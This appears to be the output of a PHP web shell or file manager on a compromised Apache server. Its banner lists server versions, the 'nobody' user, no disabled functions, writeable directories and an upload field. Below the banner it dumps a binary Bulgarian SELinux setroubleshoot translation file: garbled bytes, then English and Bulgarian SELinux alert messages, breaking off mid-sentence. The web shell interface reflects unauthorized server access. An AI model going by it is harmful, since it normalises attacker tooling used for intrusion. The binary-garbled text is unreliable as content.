KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /usr/share/locale/bg/LC_MESSAGES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/locale/bg/LC_MESSAGES/setroubleshoot-plugins.mo
}
g
h
|Z;;
AOEf0S}x}}t	r|,Ubi ".!#P$`%"&(&'O(-)J*K++,-..5/0n1R!2Gt2b2l3L3U3N/4W~4`4H75N5E5G6N]6d6a7^s7M7c 8O8`8a59X9X9VI:C:<]>>^?_@w@_4AAZQB]B?
CVJCCuFY,I]IXKZ=LoLZO`cOYQRSzU|?VWCXY
^[l[q[u[[
[[[[[[
[
[[[[
\\m]s^__q`^bNdOfNhhi4klmKop
qrrst\ug0vwxby Hzi{u|e}8~
Q&!HqE_ٙ x'Y`1WgoR¢iajˣ]6[k\fe g~Ϯ,1^/i.NηdZACý+lo C!H923QV_
ny(!<2k:%A	Z.Uaq$|9{[?c\nJC]#BORufLwyNj_t
'7SW=X)/o-QiPIv@^lsmhK+0; r>
dg3e&4GEYpMH`x6D}F8,TVz5b1"*
    Changing the "$BOOLEAN" boolean to true will allow this access:
    "setsebool -P $BOOLEAN=1"
    
    Changing the "$BOOLEAN" boolean to true will allow this access:
    "setsebool -P $BOOLEAN=1."
    
    Changing the "allow_ftpd_use_nfs" boolean to true will allow this access:
    "setsebool -P allow_ftpd_use_nfs=1."
    
    If ftp should be allowed to write to this directory you need to turn
    on the $BOOLEAN boolean and change the file context of
    the public directory to public_content_rw_t.  Read the rsync_selinux
    man page for further information:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <path>"
    
    If ftp should be allowed to write to this directory you need to turn
    on the $BOOLEAN boolean and change the file context of
    the public directory to public_content_rw_t.  Read the samba_selinux
    man page for further information:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <path>"
    
    If httpd scripts should be allowed to write to public directories you need to turn on the $BOOLEAN boolean and change the file context of the public directory to public_content_rw_t.  Read the httpd_selinux
    man page for further information:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <path>"
    
    If the ftp daemon should be allowed to write to this directory you need to turn
    on the $BOOLEAN boolean and change the file context of
    the public directory to public_content_rw_t.  Read the ftpd_selinux
    man page for further information:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <path>"
    
    If you allow the management of the kernel modules on your machine,
    turn off the $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=0".
    
    If you do not want SELinux preventing ftp from writing files anywhere on
    the system you need to turn on the $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1"
    
    If you want a confined domain to use these files you will probably
    need to relabel the file/directory with chcon. In some cases it is just
    easier to relabel the system, to relabel execute: "touch
    /.autorelabel; reboot"
    
    If you want ftp to allow users access to their home directories
    you need to turn on the $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1"
    
    If you want httpd to allow database connections you need to turn on the
    $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1"
    
    If you want httpd to be able to run a particular shell script,
    you can label it with chcon -t httpd_sys_script_exec_t SCRIPTFILE.  If you
    want httpd to be able execute any shell script you need to turn on
    the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1"
    
    If you want httpd to connect to httpd/ftp ports you need to turn
    on the $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1"
    
    If you want httpd to connect to network ports you need to turn on the
    httpd_can_network_network_connect boolean: "setsebool -P
    $BOOLEAN=1"
    
    If you want named to run as a secondary server and accept zone
    transfers you need to turn on the $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1"
    
    If you want ppp to be able to insert kernel modules you need to
    turn on the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1"
    
    If you want samba to share home directories you need to turn on
    the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1"
    
    If you want samba to share nfs file systems you need to turn on
    the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1"
    
    If you want spamd to share home directories you need to turn on
    the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1"
    
    If you want squid to connect to network ports you need to turn on
    the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1"
    
    If you want the SSL Tunnel to run as a daemon you need to turn on
    the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1".  You also need to
    tell SELinux which port SSL Tunnel will be running on.  semanage
    port -a -t stunnel_port_t -p tcp $PORT_NUMBER
    
    If you want the http daemon to share home directories you need to
    turn on the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1"
    
    If you want the http daemon to use built in scripting you need to
    enable the $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1"
    
    If you want the sasl authentication daemon to be able to read
    the /etc/shadow file change the $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1".
    
    If you want to allow user  programs to run as TCP Servers, you can turn on the user_tcp_server boolean, by executing:
    setsebool -P $BOOLEAN=1
    
    If you want to allow zebra to overwrite its configuration you must
    turn on the $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1"
    
    If you want to export a public file systems using nfs you need to
    turn on the $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1".
    
    If you want to export file systems using nfs you need to turn on
    the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1".
    
    If you want to export file systems using samba you need to turn on
    the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1".
    
    If you want to export writable file systems using nfs you need to turn on the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1".
    
    If you want to export writable file systems using samba you need to turn on the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1".
    
    If you want to modify the way SELinux is running on your machine
    you need to bring the machine to single user mode with enforcing
    turned off.  The turn off the secure_mode_policyload boolean:
    "setsebool -P secure_mode_policyload=0".
    
    SELinux denied cvs access to $TARGET_PATH.
    If this is a CVS repository it has to have a file context label of
    cvs_data_t. If you did not intend to use $TARGET_PATH as a cvs repository
    it could indicate either a bug or it could signal a intrusion attempt.
    
    SELinux denied rsync access to $TARGET_PATH.
    If this is a RSYNC repository it has to have a file context label of
    rsync_data_t. If you did not intend to use $TARGET_PATH as a rsync repository
    it could indicate either a bug or it could signal a intrusion attempt.
    
    SELinux denied samba access to $TARGET_PATH.
    If you want to share this directory with samba it has to have a file context label of
    samba_share_t. If you did not intend to use $TARGET_PATH as a samba repository
    it could indicate either a bug or it could signal a intrusion attempt.
    
    SELinux has denied kernel module utilities from modifying
    kernel modules. This machine is hardened to not allow the kernel to
    be modified, except in single user mode.  If you did not try to
    manage a kernel module, this probably signals an intrusion.
    
    SELinux has denied the Point-to-Point Protocol daemon from
    inserting a kernel module. If pppd is not setup to insert kernel
    modules, this probably signals a intrusion attempt.
    
    SELinux has denied the ftp daemon access to users home directories
    ($TARGET_PATH). Someone is attempting to login via your ftp daemon
    to a user account. If you only setup ftp to allow anonymous ftp,
    this could signal a intrusion attempt.
    
    SELinux has denied the ftp daemon write access to directories outside
    the home directory ($TARGET_PATH). Someone has logged in via
    your ftp daemon and is trying to create or write a file. If you only setup
    ftp to allow anonymous ftp,   this could signal a intrusion attempt.
    
    SELinux has denied the management tools from modifying the way the
    SELinux policy runs. This machine is hardened if you did not run
    any SELinux tools, this probably signals an intrusion.
    
    SELinux has denied the named daemon from writing zone
    files. Ordinarily, named is not required to write to these files.
    Only secondary servers should be required to write to these
    directories.  If this machine is not a secondary server, this
    could signal a intrusion attempt.
    
    SELinux has denied the samba daemon access to nfs file
    systems. Someone is attempting to access an nfs file system via
    your samba daemon. If you did not setup samba to share nfs file
    systems, this probably signals a intrusion attempt.
    
    SELinux has denied the sasl authentication daemon from reading the
    /etc/shadow file. If the sasl authentication daemon (saslauthd) is
    not setup to read the /etc/shadow, this could signals an
    intrusion.
    
    SELinux has denied the squid daemon from connecting to
    $PORT_NUMBER. By default squid policy is setup to deny squid
    connections. If you did not setup squid to network connections,
    this could signal a intrusion attempt.
    
    SELinux has denied the zebra daemon from writing out its
    configuration files. Ordinarily, zebra is not required to write
    its configuration files.  If zebra was not setup to write the
    config files, this could signal a intrusion attempt.
    
    SELinux has preventing the nfs daemon (nfsd) from read files on
    the local system. If you have not exported these file systems, this
    could signals an intrusion.
    
    SELinux has preventing the nfs daemon (nfsd) from writing files on the local system. If you have not exported any file systems (rw), this could signals an intrusion. 
    
    SELinux has preventing the nfs daemon (nfsd) from writing to
    directories marked as public. Usually these directories are
    shared between multiple network daemons, like nfs, apache, ftp
    etc.  If you have not exported any public file systems for
    writing, this could signal an intrusion.
    
    SELinux has preventing the samba daemon (smbd) from reading files on
    the local system. If you have not exported these file systems, this
    could signals an intrusion.
    
    SELinux has preventing the samba daemon (smbd) from writing files on the local system. If you have not exported any file systems (rw), this could signals an intrusion. 
    
    SELinux is preventing access to files with the default label, default_t.
    
    SELinux is preventing access to files with the label, file_t.
    
    SELinux is preventing the ftp daemon from reading users home directories ($TARGET_PATH).
    
    SELinux is preventing the ftp daemon from writing files outside the home directory ($TARGET_PATH).
    
    SELinux is preventing the http daemon from acting as a ftp server.
    
    SELinux is preventing the http daemon from communicating with the terminal.
    
    SELinux is preventing the http daemon from connecting to a database.
    
    SELinux is preventing the http daemon from connecting to network port $PORT_NUMBER
    SELinux is preventing the http daemon from connecting to the itself or the relay ports
    
    SELinux is preventing the http daemon from executing a shell script
    SELinux is preventing the http daemon from using built-in scripting.
    
    SELinux is preventing the kernel modules from being loaded.
    
    SELinux is preventing the modification of the running policy.
    
    SELinux is preventing the named daemon from writing to the zone directory
    SELinux is preventing the nfs daemon from allowing clients to write to public directories.
    
    SELinux is preventing the nfs daemon from allowing remote clients to write local files.
    
    SELinux is preventing the nfs daemon from serving r/o local files to remote clients.
    
    SELinux is preventing the ppp daemon from inserting kernel modules.
    
    SELinux is preventing the samba daemon from allowing remote clients to write local files.
    
    SELinux is preventing the samba daemon from reading nfs file systems.
    
    SELinux is preventing the samba daemon from serving r/o local files to remote clients.
    
    SELinux is preventing the sasl authentication server from reading the /etc/shadow file.
    
    SELinux is preventing the squid daemon from connecting to network port $PORT_NUMBER
    SELinux is preventing the users from running TCP servers in the usedomain.
        
    SELinux is preventing the zebra daemon from writing its configurations files
    
    SELinux permission checks on files labeled default_t are being
    denied.  These files/directories have the default label on them.  This can
    indicate a labeling problem, especially if the files being referred
    to  are not top level directories. Any files/directories under standard system directories, /usr,
    /var. /dev, /tmp, ..., should not be labeled with the default
    label. The default label is for files/directories which do not have a label on a
    parent directory. So if you create a new directory in / you might
    legitimately get this label.
    
    SELinux permission checks on files labeled file_t are being
    denied.  file_t is the context the SELinux kernel gives to files
    that do not have a label. This indicates a serious labeling
    problem. No files on an SELinux box should ever be labeled file_t.
    If you have just added a new disk drive to the system you can
    relabel it using the restorecon command.  Otherwise you should
    relabel the entire files system.
    
    SELinux policy is preventing the ftp daemon from writing to a public
    directory.
    
    SELinux policy is preventing the ftp daemon from writing to a public
    directory.  If ftpd is not setup to allow anonymous writes, this
    could signal a intrusion attempt.
    
    SELinux policy is preventing the http daemon from writing to a public
    directory.
    
    SELinux policy is preventing the rsync daemon from writing to a public
    directory.
    
    SELinux policy is preventing the rsync daemon from writing to a public
    directory.  If rsync is not setup to allow anonymous writes, this
    could signal a intrusion attempt.
    
    SELinux policy is preventing the samba daemon from writing to a public
    directory.
    
    SELinux policy is preventing the samba daemon from writing to a public
    directory.  If samba is not setup to allow anonymous writes, this
    could signal a intrusion attempt.
    
    SELinux prevented a java plugin ($SOURCE_TYPE) from making the stack executable.
    
    SELinux prevented a mplayer plugin ($SOURCE_TYPE) from making the stack executable.
    
    SELinux prevented httpd $ACCESS access to http files.
    
    SELinux prevented the CVS application from reading the shadow password file.
    
    SELinux prevented the CVS application from reading the shadow password file.
    The CVS application requires this access when it is configured for direct
    connection (i.e., pserver) and to authenticate to the system password / shadow
    files without PAM. It is possible that this access request signals an intrusion
    attempt.

    It is recommended that CVS be configured to use PAM, authenticate to a separate
    user file, or use another protocol (e.g., ssh) instead of allowing this access.
    See the CVS manual for more details on why this access is potentially insecure
    (<a href="http://ximbiot.com/cvs/manual/cvs-1.11.22/cvs_2.html">http://ximbiot.com/cvs/manual/cvs-1.11.22/cvs_2.html</a>).
    
    SELinux prevented the ftp daemon from $ACCESS files stored on a CIFS filesystem.
    CIFS (Comment Internet File System) is a network filesystem similar to
    SMB (<a href="http://www.microsoft.com/mind/1196/cifs.asp">http://www.microsoft.com/mind/1196/cifs.asp</a>)
    The ftp daemon attempted to read one or more files or directories from
    a mounted filesystem of this type.  As CIFS filesystems do not support
    fine-grained SELinux labeling, all files and directories in the
    filesystem will have the same security context.
    
    If you have not configured the ftp daemon to read files from a CIFS filesystem
    this access attempt could signal an intrusion attempt.
    
    SELinux prevented the ftp daemon from $ACCESS files stored on a CIFS filesytem.
    
    SELinux prevented the ftp daemon from $ACCESS files stored on a NFS filesystem.
    NFS (Network Filesystem) is a network filesystem commonly used on Unix / Linux
    systems.
    
    The ftp daemon attempted to read one or more files or directories from
    a mounted filesystem of this type.  As NFS filesystems do not support
    fine-grained SELinux labeling, all files and directories in the
    filesystem will have the same security context.
    
    If you have not configured the ftp daemon to read files from a NFS filesystem
    this access attempt could signal an intrusion attempt.
    
    SELinux prevented the ftp daemon from $ACCESS files stored on a NFS filesytem.
    
    SELinux prevented the gss daemon from reading unprivileged user temporary files.
    
    SELinux prevented the http daemon from $ACCESS files stored on a CIFS filesystem.
    CIFS (Windows Network Filesystem) is a network filesystem commonly used on Windows / Linux
    systems.
    
    The http daemon attempted to read one or more files or directories from
    a mounted filesystem of this type.  As CIFS filesystems do not support
    fine-grained SELinux labeling, all files and directories in the
    filesystem will have the same security context.
    
    If you have not configured the http daemon to read files from a CIFS filesystem
    this access attempt could signal an intrusion attempt.
    
    SELinux prevented the http daemon from $ACCESS files stored on a CIFS filesytem.
    
    SELinux prevented the http daemon from $ACCESS files stored on a NFS filesystem.
    NFS (Network Filesystem) is a network filesystem commonly used on Unix / Linux
    systems.
    
    The http daemon attempted to read one or more files or directories from
    a mounted filesystem of this type.  As NFS filesystems do not support
    fine-grained SELinux labeling, all files and directories in the
    filesystem will have the same security context.
    
    If you have not configured the http daemon to read files from a NFS filesystem
    this access attempt could signal an intrusion attempt.
    
    SELinux prevented the http daemon from $ACCESS files stored on a NFS filesytem.
    
    SELinux prevented the java plugin ($SOURCE_TYPE) from making the stack
    executable.  An executable stack should not be required by any
    software (see <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux Memory Protection Tests</a>
    for more information). However, some versions of the Java plugin are known
    to require this access to work properly. You should check for updates
    to the software before allowing this access.
    
    SELinux prevented the mplayer plugin ($SOURCE_TYPE) from making the stack
    executable.  An executable stack should not be required by any
    software (see <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux Memory Protection Tests</a>
    for more information). However, some versions of the mplayer plugin are known
    to require this access to work properly. You should check for updates
    to the software before allowing this access.
    
    You can execute the following command as root to relabel your
    computer system: "touch /.autorelabel; reboot"
    
    You can generate a local policy module to allow this
    access - see <a href="http://fedora.redhat.com/docs/selinux-faq-fc5/#id2961385">FAQ</a>
    Or you can disable SELinux protection altogether. Disabling
    SELinux protection is not recommended.
    Please file a <a href="http://bugzilla.redhat.com/bugzilla/enter_bug.cgi">bug report</a>
    against this package.
        If you want the http daemon to listen on the ftp port, you need to
    enable the $BOOLEAN boolean: "setsebool -P $BOOLEAN=1"
     Changing the "$BOOLEAN" and
    "$WRITE_BOOLEAN" booleans to true will allow this access:
    "setsebool -P $BOOLEAN=1 $WRITE_BOOLEAN=1".
    warning: setting the "$WRITE_BOOLEAN" boolean to true will
    allow the ftp daemon to write to all public content (files and
    directories with type public_content_t) in addition to writing to
    files and directories on CIFS filesystems.   Changing the "allow_ftpd_use_nfs" and
    "$WRITE_BOOLEAN" booleans to true will allow this access:
    "setsebool -P allow_ftpd_use_nfs=1 $WRITE_BOOLEAN=1".
    warning: setting the "$WRITE_BOOLEAN" boolean to true will
    allow the ftp daemon to write to all public content (files and
    directories with type public_content_t) in addition to writing to
    files and directories on NFS filesystems.  AuthorizationCRONCVSDomain Name ServiceFTPFile LabelFile SystemJavaKernelMediaMemoryNetwork PortsNetworkingRSYNCSAMBASELinux prevented the gss daemon from
    reading unprivileged user temporary files (e.g., files in /tmp). Allowing this
    access is low risk, but if you have not configured the gss daemon to
    read these files this access request could signal an intrusion
    attempt.Web ServerZebraProject-Id-Version: setroubleshoot-plugins-bg
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2008-02-01 15:24-0500
PO-Revision-Date: 2007-09-24 21:38+0300
Last-Translator: Doncho N. Gunchev <gunchev@gmail.com>
Language-Team: Bulgarian <dict@fsa-bg.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Generator: KBabel 1.11.4

    Установяването на булевата променлива "$BOOLEAN" ще позволи този достъп:
    "setsebool -P $BOOLEAN=1"
    
    Установяването на булевата променлива "$BOOLEAN" ще позволи този достъп:
    "setsebool -P $BOOLEAN=1."
    
    Включването на булева променлива "allow_ftpd_use_nfs" ще позволи този достъп:
    "setsebool -P allow_ftpd_use_nfs=1."
    
    Ако ftp трябва да може да пише в тази директория, вие трябва да
    включите булевата променлива $BOOLEAN и смените файловия контекст
    на публичната директория на public_content_rw_t.  Прочетете rsync_selinux
    страницата на man за повече информация:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <path>"
    
    Ако ftp трябва да може да пише в тази директория, трябва да
    включите булевата променлива $BOOLEAN и промените файловия
    контекст на публичната директория на public_content_rw_t.  Прочетете
    samba_selinux man страницата за по-нататъшна информация:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <path>"
    
    Ако http скриптовете трябва да могат да пишат в тази директория, трябва да включите булевата променлива $BOOLEAN и да промените файловия контекст на публичната директория на public_content_rw_t.  Вижте
    httpd_selinux man страницата за по-подробна информация:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <път>"
    
    Ако ftp демона трябва да може да пише в тази директория, Вие трябва та включите
    булевата променлива $BOOLEAN и смените файловия контекст на
    публичната директория на public_content_rw_t.  Прочетете man страницата
    ftpd_selinux за по-нататъшни инструкции:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <path>"
    
    If you allow the management of the kernel modules on your machine,
    turn off the $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=0".
    
    Ако не искате SELinux да спира ftp да пише файлове където и да е в
    системата, трябва да включите булевата променлива $BOOLEAN: "setsebool -P
    $BOOLEAN=1"
    
    Ако искате ограничен домейн да ползва тези файлове, по всяка
    вероятност трябва да смените етикета на файла/директорията с     chcon. В някои ситуации е по-лесно да преетикирате системата.     За да преетикирате изпълнете: "touch /.autorelabel; reboot"
    
    Ако искате ftp да позволява на потребителите достъп до техните
    потребителски домашни директории, трябва да включите 
    булевата променлива $BOOLEAN:
    "setsebool -P $BOOLEAN=1"
    
    Ако искате httpd да позволява връзки с бази данни, трябва да включите
    булевата променлива $BOOLEAN: "setsebool -P $BOOLEAN=1"
    
    Ако искате httpd да може да изпълнява този определен скрипт,
    можете да му дадете етикет с chcon -t httpd_sys_script_exec_t SCRIPTFILE.  Ако
    искате httpd да може да стартира който и да е скрипт, трябва да включите
    булевата променлива $BOOLEAN: "setsebool -P $BOOLEAN=1"
    
    Ако искате httpd да се свързва с httpd/ftp портове, трябва да
    включите булевата променлива $BOOLEAN: 
    "setsebool -P $BOOLEAN=1"
    
    Ако искате httpd да се свързва към мрежови портове, трябва да
    включите булевата променлива httpd_can_network_network_connect: 
    "setsebool -P $BOOLEAN=1"
    
    Ако искате named да работи като подчинен сървър и да приема
    трансфери на зони трябва да включите булевата променлива $BOOLEAN: 
    "setsebool -P $BOOLEAN=1"
    
    Ако искате ppp да може да зарежда модули в ядрото трябва да
    включите булевата променлива $BOOLEAN: "setsebool -P $BOOLEAN=1"
    
    Ако искате samba да споделя домашни директории, трябва да
    включите булевата променлива $BOOLEAN: "setsebool -P $BOOLEAN=1"
    
    Ако искате samba да споделя nfs файлови системи, трябва да
    включите булевата променлива $BOOLEAN:
    "setsebool -P $BOOLEAN=1"
    
    Ако искате spamd да споделя домашните директории, трябва да
    включите булевата променлива $BOOLEAN:     "setsebool -P $BOOLEAN=1"
    
    Ако искате squid да се свързва с мрежови портове, трябва да
    включите булевата променлива $BOOLEAN:     "setsebool -P $BOOLEAN=1"
    
    Ако искате SSL Tunnel да работи като демон, трябва да включите
    булевата променлива $BOOLEAN: "setsebool -P $BOOLEAN=1".      Трябва и да кажете на SELinux на кой порт SSL Tunnel ще работи.     semanage порт -a -t stunnel_port_t -p tcp $PORT_NUMBER
    
    Ако искате http демона да споделя домашните директории, 
    трябваdirectories да влючите булевата променлива $BOOLEAN: 
    "setsebool -P $BOOLEAN=1"
    
    Ако искате http демона да ползва вградени скриптове, трябва 
    да включите булевата променлива $BOOLEAN: "setsebool -P
    $BOOLEAN=1"
    
    Ако искате sasl удостоверяващия демон да може да чете
    файла /etc/shadow, включете булевата променлива $BOOLEAN: 
    "setsebool -P $BOOLEAN=1".
    
    Ако искате да позволите потребителски програми да работят като TCP сървъри, можете да включите булевата променлива user_tcp_server, стартирайки:
    setsebool -P $BOOLEAN=1
    
    Ако искате да разрешите на zebra да презаписва своите
    конфигурационни файлове, трябва да включите булевата
    променлива $BOOLEAN: "setsebool -P $BOOLEAN=1"
    
    Ако искате да споделята публични файлови системи през nfs, Вие трябва
    да включите булевата променлива $BOOLEAN: "setsebool -P
    $BOOLEAN=1".
    
    Ако искате да споделяте файлови системи чрез nfs трябва да включите
    булевата променлива $BOOLEAN: "setsebool -P $BOOLEAN=1".
    
    Ако искате да споделяте файлови системи чрез samba трябва да включите
    булевата променлива $BOOLEAN: "setsebool -P $BOOLEAN=1".
    
    Ако искате да споделяте файлови системи за писане през nfs, вие трябва да включите булевата променлива $BOOLEAN: "setsebool -P $BOOLEAN=1".
    
    Ако искате да споделяте файлови системи за писане през samba, вие трябва да включите булевата променлива $BOOLEAN: "setsebool -P $BOOLEAN=1".
    
    Ако искате да промените начина на работа на SELinux на своята
    мапина, трябва да доведете машината до режим на единичен
    потребител с изключено налагане на SELinux.  За да изключите
    булевата променлива secure_mode_policyload изпълнете:
    "setsebool -P secure_mode_policyload=0".
    
    SELinux забрани на cvs достъпа до $TARGET_PATH.
    Ако това е CVS хранилище, то трябва да има файлов контекст 
    от тип cvs_data_t. Ако не сте смятали да ползвате $TARGET_PATH като cvs хранилище
    това може да е или грешка или да показва опит за пробив.
    
    SELinux забрани на rsync достъп до $TARGET_PATH.
    Ако това е RSYNC хранилище, то то трябва да има файлов контекст от тип
    rsync_data_t. Ако не сте възнамерявали да ползвате $TARGET_PATH като rsync хранилище
    това може да показва или грешка или опит за пробив.
    
    SELinux забрани на samba достъп до $TARGET_PATH.
    Ако искате да споделите тази директория със samba тя трябва да има файлов етикет
    за контекст от типа samba_share_t. Ако не сте смятали да ползвате 
$TARGET_PATH
    като samba хранилище, това може да показва или грешка или може да
    е сигнал за опит за пробив.
    
    SELinux попречи на инструментите за модули на ядрото да ги променят.
    За по сигурна работа, тази машина е настроена да не позволява ядрото
    да бъде променяно, освен в режим на единичен потребител.  Ако вие не
    сте се опитали да настройвате модул на ядрото, това сигурно е сигнал
    за пробив.
    
    SELinux е попречил на демона за протокола Point-to-Point да
    зареди модул на ядрото. Ако pppd не е настроен да зарежда
    модули, това сигурно е сигнал за опит за пробив.
    
    SELinux забрани на ftp демона достъп до потребителските директории
    ($TARGET_PATH). Някой се опитва да влезе през вашия ftp демон до
    потребителски акаунт. Ако сте настроили ftp да позволява само анонимно
    ftp, това може да е опит за пробив.
    
    SELinux забрани на ftp демона достъп за запис до директория извън
    домашната директория ($TARGET_PATH). Някой е влязъл през
    вашия ftp демон и се опитва да създаде или пише в файл. Само ако сте настроили
    ftp да позволява анонимен ftp достъп,   това може да е сигнал за опит за проникване.
    
    SELinux забрани на инструмента за мениджмънт да промени начина
    на работа на SELinux политиката. Тази машина е настроена за по-голяма
    сигурност и ако Вие не сте стартирали никой SELinux инструмент, то това
    сигурно е сигнал за пробив.
    
    SELinux забрани на демона named да запише файл на
    зона. Обикновено named не трябва да пише в тези файлове.
    Само подчинените сървъри трябва да могат да пишат в тези
    директории.  Ако тази машина не е подчинен сървър, то това
    може да е сигнал за опит за пробив.
    
    SELinux забрани на samba демона достъп до nfs файлови
    системи. Някой се опитва да достъпи nfs файлова система през
    вашия samba демон. Ако не сте настройвали samba да споделя
    nfs файлови системи, то това сигурно е сигнал за опит за пробив.
    
    SELinux забрани на sasl демона за удостоверяване да чете от
    файла /etc/shadow. Ако sasl демона з аудостоверяване (saslauthd)
    не е настроен да чете /etc/shadow, това може да е сигнал за
    пробив.
    
    SELinux забрани на squid демона да се свърже към 
    $PORT_NUMBER. По подразбиране политиката за squid policy е 
    настроена да забранява на squid връзки. Ако не сте настроили
    squid за мрежови връзки, това може да е знак за опит за пробив.
    
    SELinux забрани на zebra демона да запише своите
    конфигурационни файлове. Обикновено, zebra не е
    необходимо да записва конфигурационните си 
    файлове.  Ако zebra не е настроена да пише своите
    конфигурационни файлове, това може да е опит за
    пробив.
    
    SELinux попречи на nfs демона (nfsd) да чете файлове от
    локалната система. Ако не сте споделили тези файлови системи,
    то това може да сигнализира за пробив.
    
    SELinux е спрял nfs демона (nfsd) да пише файлове в локалната система. Ако не споделяте файлови системи (за четене и запис), това може да е сигнал за пробив. 
    
    SELinux попречи на nfs демона (nfsd) да пише в директория,
    маркирана като публична. Обикновено тези директории са
    споделени между много мрежови демони, като nfs, apache, ftp
    и т.н.  Ако не сте споделили никоя публична файлова система с
    права за писане, то това може да е знак за пробив.
    
    SELinux попречи на samba демона (smbd) да чете файлове от
    локалната система. Ако не сте споделили тези файлови системи,
    то това може да сигнализира за пробив.
    
    SELinux спира samba демона (smbd) да пише файлове в локалната система. Ако не споделяте файлови системи (за четене и запис), това може да е сигнал за пробив. 
    
    SELinux спира достъпа до файлове с етикет по подразбиране default_t.
    
    SELinux спира достъпа до файлове с етикета file_t.
    
    SELinux пречи на ftp демона да чете файлове от домашни потребителски директории ($TARGET_PATH).
    
    SELinux пречи на ftp демона да пише файлове извън домашната директория ($TARGET_PATH).
    
    SELinux пречи на http демона да работи като ftp сървър.
    
    SELinux пречи на http да комуникира с терминала.
    
    SELinux пречи на http демона да да се свърже с база данни.
    
    SELinux пречи на http демона да се свърже към мрежов порт $PORT_NUMBER
    SELinux пречи на http демона да се свърже към себе си или към портовете за ретранслация
    
    SELinux пречи на http демона да стартира скрипт на обвивката
    SELinux пречи на http демона да ползва вградени скриптове.
    
    SELinux пречи на зареждането на модули на ядрото.
    
    SELinux спира промяната на работещата политика.
    
    SELinux пречи на named демона да записва в директорията с зони
    SELinux пречи на nfs демона да даде на клиенти да пишат в публични директории.
    
    SELinux пречи на nfs демона да даде на отдалечени клиенти да пишат локални файлове.
    
    SELinux пречи на nfs демона да даде на отдалечени клиенти да четат локални файлове.
    
    SELinux пречи на ppp демона да зарежда модули на ядрото.
    
    SELinux пречи на samba демона да даде на отдалечени клиенти да пишат локални файлове.
    
    SELinux пречи на демона samba да чете nfs файлова система.
    
    SELinux пречи на samba демона да даде на отдалечени клиенти да четат локални файлове.
    
    SELinux пречи на sasl услугата за удостоверяване да чете от файл /etc/shadow.
    
    SELinux спира squid демона да се свърже с мрежов порт $PORT_NUMBER
    SELinux възпрепятства потребителя да стартира TCP сървъри в usedomain.
        
    SELinux пречи на zebra демона да запише своите конфигурационни файлове
    
    SELinux проверки за достъп до тип default_t са били забранени.
    Тези файлове/директории имат стандартен етикет.  Това може
    да е проблем с етикетите, особено ако файловете до които има
    обръщение не са основни директории. Никои файлове/директории в стандартните системни директории, /usr,
    /var. /dev, /tmp, ..., не трябва да имат такъв етикет.
    Стандартния етикет е за файлове/директории които нямат поставен етикет на
    родителската директория. Ако сте създали нова директория в /, може
    напълно нормално да сте получили този етикет.
    
    Проверката на правата в SELinux за файлове с етикет file_t са
    забранени.  file_t е подразбиращия се контекст, който SELinux
    ядрото дава на файлове нямащи такъв. Това показва сериозен
    проблем с етикетите. Никой файл в SELinux машина не трябва да
    бъде с етикет file_t. Ако току що сте добавили нов диск към 
    можете да го преетикирате с команда restorecon.  В противен
    случай, трябва да преетикирате цялата система.
    
    SELinux политиката пречи на ftp демона да пише в публична
    директория.
    
    SELinux политиката пречи на ftp демона да пише в публична
    директория.  Ако ftpd не е настроен да позволява анонимен запис, това
    може да сигнализира опит за пробив.
    
    SELinux политиката пречи на http демона да пише в публична
    директория.
    
    SELinux политиката пречи на rsync демона да пише в публична
    директория.
    
    SELinux политиката пречи на rsync демона да пише в публична
    директория.  Ако rsync не е настроен да позволява анонимно писане,
    това може да е сигнал за опит за пробив.
    
    SELinux политиката пречи на samba демона да пише в публична
    директория.
    
    SELinux политиката пречи на samba демона да пише в публична
    директория.  Ако samba не е настроена да позволява анонимно 
    писане, това може да е знак за опит за пробив.
    
    SELinux попречи на java разширение ($SOURCE_TYPE) да направи стека изпълним.
    
    SELinux попречи на разширението на mplayer ($SOURCE_TYPE) да направи стека изпълним.
    
    SELinux предотврати httpd достъп за $ACCESS до уеб файлове.
    
    SELinux спря приложението CVS при опит за четене на файла с пароли shadow.
    
    SELinux спря приложението CVS при опит за четене на файла с пароли shadow.
    Приложението CVS изисква такъв достъп когато е конфигурирано задиректна
    връзка (напр., pserver) и да удостоверява със системните password / shadow
